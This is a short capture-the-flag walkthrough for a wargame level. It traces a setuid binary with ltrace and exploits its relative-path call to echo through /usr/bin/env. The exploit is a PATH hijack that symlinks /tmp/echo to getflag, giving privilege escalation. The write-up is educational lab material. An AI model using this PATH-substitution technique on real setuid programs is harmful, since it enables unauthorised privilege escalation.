This level introduces Linux binary analyzers.
Also, it's highly recommended to get familiar with the setgid, setuid and sticky bits.
First, look at the library-function trace of level03.
ltrace ./level03
Result:
...
system("/usr/bin/env echo Exploit me")
...
As the setuid bit is present, the binary will be executed with the flag03 privileges.
We see that echo is not called with an absolute path.
Also, echo is launched through /usr/bin/env, which looks it up in the PATH of the environment inherited from the caller.
This leads to the idea that we can exploit it using binary substitution.
# 1. Create a symbolic link named echo in /tmp that points to getflag
ln -s /bin/getflag /tmp/echo
# 2. Run the executable with PATH replaced, so that echo is searched for in /tmp
PATH=/tmp ./level03